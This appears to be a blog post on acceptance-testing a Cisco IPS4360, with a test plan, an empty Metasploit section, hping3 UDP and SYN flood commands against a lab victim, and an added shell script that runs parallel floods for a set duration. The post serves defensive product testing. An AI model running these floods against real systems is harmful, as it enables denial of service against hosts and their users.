Intrusion detection and prevention test
This post demonstrates an example of how to do an IPS factory acceptance test.
Test plan parameters example
Product: IPS4360-K9
Serial Number: abcdefg
Date: 27/Jan/2013
Purpose: This test verifies the ability of the IPS to block malicious traffic when a signature is matched.
Procedure: On the attacker PC, launch Metasploit. Launch an attack against the victim. Launch Event Viewer to view the IPS events.
Expected results:
1. Cisco IPS blocks the attack (Pass/Fail)
2. IPS events are shown in Event Viewer (Pass/Fail)
3. The Metasploit attack times out (Pass/Fail)
Remarks:
Modify your procedure and expected results according to the tool you use. The sections below demonstrate the attacks and the results expected from the Cisco IPS.
Metasploit attacks
This section demonstrates the exploits and payloads used for the test, first run without the IPS in place so you have a baseline to compare against.



Metasploit attacks dropped by Cisco IPS4360
Denial of service attack with hping3
From the attacker's machine, launch a UDP flood with hping3:
hping3 --udp --flood 192.168.56.102
Open a new tab and launch a SYN flood:
hping3 -S --flood 192.168.56.102
Open as many tabs as you want to launch multiple floods in parallel. You should also open Task Manager on the Windows XP victim to monitor resource usage.
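Opening one tab per flood is fine for a one-off run, but an acceptance test should be repeatable: the same number of floods, for the same duration, with everything cleaned up afterwards. The script below is an added example and is not part of the original post or a Cisco tool. It assumes hping3 is installed and that it runs as root on the attacker PC; the victim address is the one used above, and the duration and worker count are constructed defaults you can override through environment variables.

```shell
#!/bin/sh
# Added example, not from the original post: run the UDP and SYN floods from
# the test plan in parallel for a fixed time, then kill them all.
# Assumes hping3 is installed and this runs as root on the attacker PC.

VICTIM="${VICTIM:-192.168.56.102}"   # victim address from the test plan
DURATION="${DURATION:-30}"           # seconds to flood (constructed default)
WORKERS="${WORKERS:-4}"              # parallel floods per protocol (constructed default)

# Reject anything that is not a dotted-quad IPv4 address so a typo in VICTIM
# does not flood the wrong host. Returns 0 on a valid address, 1 otherwise.
valid_ipv4() {
    case $1 in
        *[!0-9.]*|*..*|.*|*.) return 1 ;;
    esac
    n=0
    rest=$1
    while [ -n "$rest" ]; do
        o=${rest%%.*}
        [ "$o" -le 255 ] || return 1
        n=$((n + 1))
        [ "$rest" = "$o" ] && break
        rest=${rest#*.}
    done
    [ "$n" -eq 4 ]
}

# Print the hping3 command line for one flood type against a target.
# flood_cmd <udp|syn> <target>
flood_cmd() {
    case $1 in
        udp) printf 'hping3 --udp --flood %s\n' "$2" ;;
        syn) printf 'hping3 -S --flood %s\n' "$2" ;;
        *)   return 1 ;;
    esac
}

# Launch WORKERS floods of each type in the background, wait DURATION seconds,
# then terminate every flood so the victim can be re-checked in a clean state.
run_floods() {
    valid_ipv4 "$VICTIM" || { echo "bad victim address: $VICTIM" >&2; return 1; }
    pids=""
    i=0
    while [ "$i" -lt "$WORKERS" ]; do
        for proto in udp syn; do
            sh -c "$(flood_cmd "$proto" "$VICTIM")" >/dev/null 2>&1 &
            pids="$pids $!"
        done
        i=$((i + 1))
    done
    # Make sure Ctrl-C also stops the floods rather than leaving them running.
    trap 'kill $pids 2>/dev/null; exit 130' INT TERM
    echo "flooding $VICTIM with $((WORKERS * 2)) hping3 workers for ${DURATION}s"
    sleep "$DURATION"
    kill $pids 2>/dev/null
    wait $pids 2>/dev/null
    echo "floods stopped"
}

# Only flood when explicitly asked, so sourcing the file for its helpers is safe.
if [ "${1-}" = "--run" ]; then
    run_floods
fi
```

Run it as `VICTIM=192.168.56.102 DURATION=60 WORKERS=8 sh flood.sh --run` (the filename is an assumption) once with the IPS out of the path to confirm the victim's CPU climbs, then again with the IPS in place; the only change between the two runs should be the IPS, which is what makes the Pass/Fail result meaningful.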


When the Cisco IPS blocks this type of attack it fires an alert and drops the flood. The Windows XP victim's CPU usage will no longer sit at a constant 88% to 90%; it will return to a normal level of roughly 0% to 9%.
Cisco IPS denial of service event
Other IPS events
This section displays the various IPS events. It gives you an idea of which types of intrusion tools trigger the signatures.